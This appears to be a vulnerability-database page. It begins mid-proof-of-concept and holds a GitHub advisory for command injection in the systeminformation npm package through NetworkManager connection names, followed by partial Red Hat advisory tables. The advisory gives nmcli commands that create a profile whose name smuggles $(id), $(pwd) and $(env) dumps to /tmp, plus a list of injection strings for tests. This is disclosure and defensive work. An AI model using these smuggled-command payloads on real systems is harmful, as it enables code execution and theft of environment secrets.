console.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=>{console.error(e); process.exit(1);});"
Confirm command execution:
test -e /tmp/si-nm-id-proof && echo CONFIRMED || echo FAILED
cat /tmp/si-nm-id-proof
cat /tmp/si-nm-pwd-proof
Inspect environment key categories without printing secret values:
node -e "
const fs=require('fs');
const keys=fs.readFileSync('/tmp/si-nm-env-proof','utf8')
.split(/\n/).map(l=>l.split('=')[0]).filter(Boolean);
const wanted=['PATH','USER','HOME','SHELL','PWD','SSH_AUTH_SOCK','GITHUB_TOKEN','NPM_TOKEN','AWS_ACCESS_KEY_ID'];
console.log('env_key_count='+keys.length);
console.log('present_categories='+wanted.filter(k=>keys.includes(k)).join(','));
"
validated evidence:
saw_dummy_iface=true
uid=1000(smart) gid=1000(smart)
pwd=/home/smart/Downloads/systeminformation-master
env_key_count=74
present_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK
Local Validation Summary & Aggregate Reachability
Validation was performed against real NetworkManager and real nmcli. The primary proof did not rely on a PATH stub.
Observed behavior:
- The malicious profile was accepted by NetworkManager.
- The active connection name appeared unchanged in
nmcli device status. - Calling only
require('./lib').networkInterfaces()triggered execution. - The proof artifacts were created only after the library call.
- The
idoutput matched the calling Node.js process identity. - The
pwdoutput matched the Node.js process working directory. - The environment proof demonstrated access to process-environment categories without printing secret values.
Aggregate API reachability:
lib/index.js:94:getStaticData()reachesnetwork.networkInterfaces()as part of static data collection.lib/index.js:307:getAllData()reachesgetStaticData()first.
During local validation, an aggregate runtime attempt later hit an unrelated osinfo.js error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was not used as the primary exploit proof.
Why This Is Not Intended Behavior
networkInterfaces() is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.
The library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for connectionName is inconsistent with that defensive pattern.
Executing shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.
Recommended Fix
Avoid shell interpolation entirely for NetworkManager calls.
Replace shell command strings with execFileSync() or spawnSync() using argument arrays. For example:
const { execFileSync } = require('child_process');
const output = execFileSync(
'nmcli',
['connection', 'show', connectionName],
util.execOptsLinux
).toString();
Recommended code-level changes:
- Replace
nmcli device status 2>/dev/null | grep ${interfaceName}with argument-array execution and filter rows in JavaScript. - Replace every
nmcli connection show "${connectionName}" | grep ...shell string with argument-array execution. - Parse
ipv4.method,ipv4.dns-search, and802-1x.eapin JavaScript instead of using shellgrep. - Treat NetworkManager profile names as untrusted input even though they originate from local system state.
- Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.
Regression Test Ideas
Add Linux-specific tests for NetworkManager connection names containing shell metacharacters.
Suggested malicious connection names:
name$(...)name"; ...; #`name...```name|...name;...
Expected behavior after the fix:
networkInterfaces()completes without executing shell syntax from the connection name.- No marker files or equivalent side effects are produced.
- The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.
- Tests cover all three current sink helpers:
- DHCP lookup
- DNS suffix lookup
- IEEE 802.1x auth lookup
For unit-level coverage, mock the NetworkManager command wrapper so that nmcli device status returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.
Credit request
If you publish an advisory or assign a CVE, please credit me as:
Ali Firas (thesmartshadow) - https://www.smartshadow.dev
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 5.31.5"
},
"package": {
"ecosystem": "npm",
"name": "systeminformation"
},
"ranges": [
{
"events": [
{
"introduced": "4.17.0"
},
{
"fixed": "5.31.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44724"
],
"database_specific": {
"cwe_ids": [
"CWE-78"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-13T15:29:21Z",
"nvd_published_at": "2026-05-27T20:16:37Z",
"severity": "HIGH"
},
"details": "## Summary\n\nOn Linux, `systeminformation` is vulnerable to command injection in `networkInterfaces()` when an **active NetworkManager connection profile name** contains shell metacharacters.\n\nThis is not caused by a caller passing attacker-controlled arguments into `networkInterfaces()`. The vulnerable value is obtained internally from real `nmcli device status` output. The library sanitizes the network interface name before using it in shell commands, but it does **not** apply equivalent sanitization to the parsed NetworkManager connection profile name. That unsanitized `connectionName` is then interpolated into three shell command strings executed through `execSync()`.\n\nThis issue was validated locally against **real NetworkManager** and **real `nmcli`**. Calling only:\n\n```js\nrequire(\u0027./lib\u0027).networkInterfaces()\n```\n\nwas enough to trigger execution. The injected command ran with the privileges of the calling Node.js process.\n\n## Affected Component \u0026 Versions\n\n**Affected component:**\n\n- [`lib/network.js`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js)\n- `networkInterfaces()`\n- Linux NetworkManager / `nmcli` handling\n\n\n## Impact \u0026 Threat Model\n\n**Confirmed impact:**\n\nAn attacker who can create or rename an **active NetworkManager connection profile** can execute arbitrary shell commands when a Node.js process using `systeminformation` calls `networkInterfaces()`.\n\n**Confirmed realistic affected deployments include:**\n\n- local inventory agents\n- monitoring agents\n- diagnostics tools\n- admin dashboard backends collecting host information\n- privileged local desktop or device-management agents\n\nIf such a process runs with elevated privileges, the injected command executes with those same elevated privileges.\n\n**Confirmed facts:**\n\n- The payload was stored as a real NetworkManager connection profile name.\n- Real `nmcli device status` returned the name unchanged.\n- `networkInterfaces()` parsed that value and reused it in shell commands.\n- The injected command ran as the calling Node.js process.\n- Environment key categories were reachable from the injected process context.\n\n**Not claimed:**\n\n- No remote exploitation claim is made.\n- No `AV:N` or `AV:A` claim is made.\n- No SSID-to-connection-name attack path is claimed.\n- File-delivery-only `.nmconnection` import was not confirmed as a remote or unauthenticated path.\n\n## Root Cause Analysis\n\nThe root cause is inconsistent trust handling between the Linux interface name and the NetworkManager connection profile name.\n\nThe interface name is sanitized before it is embedded into shell commands:\n\n```js\nconst iface = dev.split(\u0027:\u0027)[0].trim();\nconst s = util.isPrototypePolluted() ? \u0027---\u0027 : util.sanitizeShellString(iface);\n```\n\nHowever, the NetworkManager connection name is parsed from command output and later reused without equivalent sanitization:\n\n```js\nconst connectionNameLines = resultFormat.split(\u0027 \u0027).slice(3);\nconst connectionName = connectionNameLines.join(\u0027 \u0027);\nreturn connectionName !== \u0027--\u0027 ? connectionName : \u0027\u0027;\n```\n\nThat is unsafe because NetworkManager profile names can contain shell metacharacters. Quoting the value inside `\"${connectionName}\"` does not make it safe. A connection name containing `\"`, `$()`, `;`, backticks, or similar shell syntax can break out of the intended argument context or trigger command substitution.\n\nThe vulnerable code executes through `execSync()`, which invokes a shell for command strings. As a result, interpolating `connectionName` into the command string creates a command-injection sink.\n\n## Exact Code Flow \u0026 File Paths\n\n**Source:** [`lib/network.js:538-544`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L538-L544)\n\n```js\nfunction getLinuxIfaceConnectionName(interfaceName) {\n const cmd = `nmcli device status 2\u003e/dev/null | grep ${interfaceName}`;\n\n try {\n const result = execSync(cmd, util.execOptsLinux).toString();\n const resultFormat = result.replace(/\\s+/g, \u0027 \u0027).trim();\n const connectionNameLines = resultFormat.split(\u0027 \u0027).slice(3);\n```\n\nThe parsed value is then returned as `connectionName`.\n\n**Trigger:** [`lib/network.js:987-991`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L987-L991)\n\n```js\nlines = execSync(cmd, util.execOptsLinux).toString().split(\u0027\\n\u0027);\nconst connectionName = getLinuxIfaceConnectionName(ifaceSanitized);\ndhcp = getLinuxIfaceDHCPstatus(ifaceSanitized, connectionName, _dhcpNics);\ndnsSuffix = getLinuxIfaceDNSsuffix(connectionName);\nieee8021xAuth = getLinuxIfaceIEEE8021xAuth(connectionName);\n```\n\n**Sink 1:** [`lib/network.js:620`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L620-L620)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep ipv4.method;`;\n```\n\n**Sink 2:** [`lib/network.js:660`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L660-L660)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep ipv4.dns-search;`;\n```\n\n**Sink 3:** [`lib/network.js:676`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/network.js#L676-L676)\n\n```js\nconst cmd = `nmcli connection show \"${connectionName}\" 2\u003e/dev/null | grep 802-1x.eap;`;\n```\n\nThere are **three distinct exploitable `connectionName` sinks**.\n\n\n## Proof of Concept (PoC) \u0026 Reproduction Steps\n\nThe following PoC is harmless and local-only. It uses a dummy NetworkManager connection and writes proof files under /tmp.\n\nRun from the project root:\n\n```bash\ncd /path/to/systeminformation\n```\n\nConfirm proof files do not already exist:\n\n```bash\ntest -e /tmp/si-nm-id-proof \u0026\u0026 echo EXISTS || echo NOT_YET\ntest -e /tmp/si-nm-pwd-proof \u0026\u0026 echo EXISTS || echo NOT_YET\ntest -e /tmp/si-nm-env-proof \u0026\u0026 echo EXISTS || echo NOT_YET\n```\n\nCreate a malicious NetworkManager dummy profile:\n\n```bash\nnmcli connection add type dummy ifname si-nmghsa0 con-name \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027\n```\n\nAssign a documentation-only address so Node\u2019s os.networkInterfaces() sees the dummy interface:\n\n```bash\nnmcli connection modify \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027 \\\n ipv4.method manual \\\n ipv4.addresses 192.0.2.253/32 \\\n ipv6.method disabled\n```\n\nActivate the profile:\n\n```bash\nnmcli connection up \u0027si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\u0027\n```\n\nConfirm real nmcli exposes the malicious connection name unchanged:\n\n```bash\nnmcli device status | grep si-nmghsa0\n```\n\nExpected relevant output includes the active connection name:\n\n```text\nsi-nmghsa0 dummy connected si-ghsa$(id\u003e/tmp/si-nm-id-proof)$(pwd\u003e/tmp/si-nm-pwd-proof)$(env\u003e/tmp/si-nm-env-proof)\n```\n\nTrigger the vulnerable library path with no attacker-controlled function argument:\n\n```bash\nnode -e \"const si=require(\u0027./lib\u0027); si.networkInterfaces().then((interfaces)=\u003e{const item=interfaces.find((entry)=\u003eentry.iface===\u0027si-nmghsa0\u0027); console.log(\u0027saw_dummy_iface=\u0027 + Boolean(item)); if (item)\nconsole.log(JSON.stringify({iface:item.iface, ip4:item.ip4, dhcp:item.dhcp, dnsSuffix:item.dnsSuffix, ieee8021xAuth:item.ieee8021xAuth}));}).catch((e)=\u003e{console.error(e); process.exit(1);});\"\n```\n\nConfirm command execution:\n\n```bash\ntest -e /tmp/si-nm-id-proof \u0026\u0026 echo CONFIRMED || echo FAILED\ncat /tmp/si-nm-id-proof\ncat /tmp/si-nm-pwd-proof\n```\n\nInspect environment key categories without printing secret values:\n\n```bash\nnode -e \"\nconst fs=require(\u0027fs\u0027);\nconst keys=fs.readFileSync(\u0027/tmp/si-nm-env-proof\u0027,\u0027utf8\u0027)\n .split(/\\n/).map(l=\u003el.split(\u0027=\u0027)[0]).filter(Boolean);\nconst wanted=[\u0027PATH\u0027,\u0027USER\u0027,\u0027HOME\u0027,\u0027SHELL\u0027,\u0027PWD\u0027,\u0027SSH_AUTH_SOCK\u0027,\u0027GITHUB_TOKEN\u0027,\u0027NPM_TOKEN\u0027,\u0027AWS_ACCESS_KEY_ID\u0027];\nconsole.log(\u0027env_key_count=\u0027+keys.length);\nconsole.log(\u0027present_categories=\u0027+wanted.filter(k=\u003ekeys.includes(k)).join(\u0027,\u0027));\n\"\n```\n\nvalidated evidence:\n\n```text\nsaw_dummy_iface=true\nuid=1000(smart) gid=1000(smart)\npwd=/home/smart/Downloads/systeminformation-master\nenv_key_count=74\npresent_categories=PATH,USER,HOME,SHELL,PWD,SSH_AUTH_SOCK\n```\n\n## Local Validation Summary \u0026 Aggregate Reachability\n\nValidation was performed against **real NetworkManager** and **real `nmcli`**. The primary proof did not rely on a PATH stub.\n\n**Observed behavior:**\n\n- The malicious profile was accepted by NetworkManager.\n- The active connection name appeared unchanged in `nmcli device status`.\n- Calling only `require(\u0027./lib\u0027).networkInterfaces()` triggered execution.\n- The proof artifacts were created only after the library call.\n- The `id` output matched the calling Node.js process identity.\n- The `pwd` output matched the Node.js process working directory.\n- The environment proof demonstrated access to process-environment categories without printing secret values.\n\n**Aggregate API reachability:**\n\n- [`lib/index.js:94`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/index.js#L94-L94): `getStaticData()` reaches `network.networkInterfaces()` as part of static data collection.\n- [`lib/index.js:307`](https://github.com/sebhildebrandt/systeminformation/blob/ed1cac537c59763301d802ad1b55b4b8581e7553/lib/index.js#L307-L307): `getAllData()` reaches `getStaticData()` first.\n\nDuring local validation, an aggregate runtime attempt later hit an unrelated `osinfo.js` error in that environment. Because of that, aggregate source reachability is confirmed, but aggregate call completion was **not** used as the primary exploit proof.\n\n## Why This Is Not Intended Behavior\n\n`networkInterfaces()` is documented and expected to return network interface metadata such as interface name, IP addresses, DHCP state, DNS suffix, and IEEE 802.1X status.\n\nThe library already shows an intent to protect shell command construction by sanitizing interface names before shell use. The missing sanitization for `connectionName` is inconsistent with that defensive pattern.\n\nExecuting shell commands embedded in a NetworkManager profile name is not a documented feature, not required to return network metadata, and not an expected design tradeoff. This is a command injection vulnerability caused by unsafe shell-string construction.\n\n## Recommended Fix\n\nAvoid shell interpolation entirely for NetworkManager calls.\n\nReplace shell command strings with `execFileSync()` or `spawnSync()` using argument arrays. For example:\n\n```js\nconst { execFileSync } = require(\u0027child_process\u0027);\n\nconst output = execFileSync(\n \u0027nmcli\u0027,\n [\u0027connection\u0027, \u0027show\u0027, connectionName],\n util.execOptsLinux\n).toString();\n```\n\n**Recommended code-level changes:**\n\n- Replace `nmcli device status 2\u003e/dev/null | grep ${interfaceName}` with argument-array execution and filter rows in JavaScript.\n- Replace every `nmcli connection show \"${connectionName}\" | grep ...` shell string with argument-array execution.\n- Parse `ipv4.method`, `ipv4.dns-search`, and `802-1x.eap` in JavaScript instead of using shell `grep`.\n- Treat NetworkManager profile names as untrusted input even though they originate from local system state.\n- Do not rely on quoting or escaping as the main mitigation. Argument-array execution is the correct fix.\n\n## Regression Test Ideas\n\nAdd Linux-specific tests for NetworkManager connection names containing shell metacharacters.\n\n**Suggested malicious connection names:**\n\n- `name$(...)`\n- `name\"; ...; #`\n- ``name`...``` \n- `name|...`\n- `name;...`\n\n**Expected behavior after the fix:**\n\n- `networkInterfaces()` completes without executing shell syntax from the connection name.\n- No marker files or equivalent side effects are produced.\n- The function either returns metadata for the interface or safely returns unknown/default values for fields that cannot be queried.\n- Tests cover all three current sink helpers:\n - DHCP lookup\n - DNS suffix lookup\n - IEEE 802.1x auth lookup\n\nFor unit-level coverage, mock the NetworkManager command wrapper so that `nmcli device status` returns a connection name containing metacharacters, then assert that subsequent calls use argument arrays rather than shell strings.\n\n## Credit request\nIf you publish an advisory or assign a CVE, please credit me as:\n\nAli Firas (thesmartshadow) - https://www.smartshadow.dev",
"id": "GHSA-hvx9-hwr7-wjj9",
"modified": "2026-06-08T23:53:59Z",
"published": "2026-05-13T15:29:21Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-hvx9-hwr7-wjj9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44724"
},
{
"type": "PACKAGE",
"url": "https://github.com/sebhildebrandt/systeminformation"
},
{
"type": "WEB",
"url": "https://github.com/sebhildebrandt/systeminformation/releases/tag/v5.31.6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Systeminformation vulnerable to Linux command injection in networkInterfaces() via unsanitized NetworkManager connection profile name"
}
RHSA-2026:33574
Vulnerability from csaf_redhat - Published: 2026-06-30 15:00 - Updated: 2026-07-01 20:16A flaw was found in the shell-quote component. The quote() function did not properly validate object-token inputs, allowing line terminators to pass unescaped into the output. A remote attacker could exploit this vulnerability by providing specially crafted input, which a POSIX shell would interpret as a command separator. This could lead to command injection, enabling the attacker to execute arbitrary code on the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in json-2-csv. An attacker can bypass the `preventCsvInjection` option to inject malicious formulas into CSV (Comma Separated Values) files. When these manipulated CSV files are opened in spreadsheet applications, the injected formulas can execute, potentially leading to arbitrary code execution or information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in the `crypto/x509` package of `golang`. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by presenting a specially crafted X.509 certificate with a large number of DNS Subject Alternative Name (SAN) entries. The certificate verification process, specifically the `VerifyHostname` function, incurs excessive computational overhead due to repeated string operations when processing these entries. This can lead to a significant performance degradation or unresponsiveness of systems validating such certificates.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
A flaw was found in the `net` package of Go (golang), specifically when using the `LookupCNAME` function with the `cgo` DNS resolver. A remote attacker could exploit this by providing a very long Canonical Name (CNAME) response. This can trigger a double-free of C memory, leading to a crash and a Denial of Service (DoS) for the affected application.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
A flaw was found in the `net/mail` package of the Go programming language. An attacker could provide specially crafted inputs to the `ParseAddress`, `ParseAddressList`, or `ParseDate` functions. This could lead to excessive consumption of CPU and memory resources, resulting in a Denial of Service (DoS) for applications processing these inputs.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application's core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution "Gadget" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in Axios, a promise-based HTTP client. An attacker who can control the destination address of an Axios request can exploit this vulnerability. By using specific internal network addresses (within the 127.0.0.0/8 range, excluding 127.0.0.1), the attacker can completely bypass the NO_PROXY protection, potentially leading to unauthorized access or information disclosure within the network. This issue is an incomplete fix for a previous vulnerability.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — | ||
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution "Gadget" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in ip-address, a JavaScript library for parsing and manipulating IPv4 and IPv6 addresses. This vulnerability allows a remote attacker to perform cross-site scripting (XSS) by providing untrusted input to the Address6 constructor. When an application renders the output of Address6.group(), Address6.link(), or the AddressError.parseMessage as HTML without proper escaping, the attacker-controlled content can be executed in the user's browser.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:044d2d72c21329826c144d9b55c381576a421188139de0fed693e74997665d2c_amd64 | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:66fb23e8dbced7bb187928fb38562ae9e2649265d56f745044dd5e79b4209893_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:219babfcc89ae903edf35022aae79ba1d1b326386978db8ff267e24e50f9a785_amd64 | — |
Workaround
|
A flaw was found in the `net/mail` package within the Go standard library. A remote attacker could provide specially crafted, pathological email addresses. When these malformed email addresses are parsed by the `consumePhrase` function, it can lead to excessive resource consumption due to quadratic string concatenation, resulting in a Denial of Service (DoS) condition.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
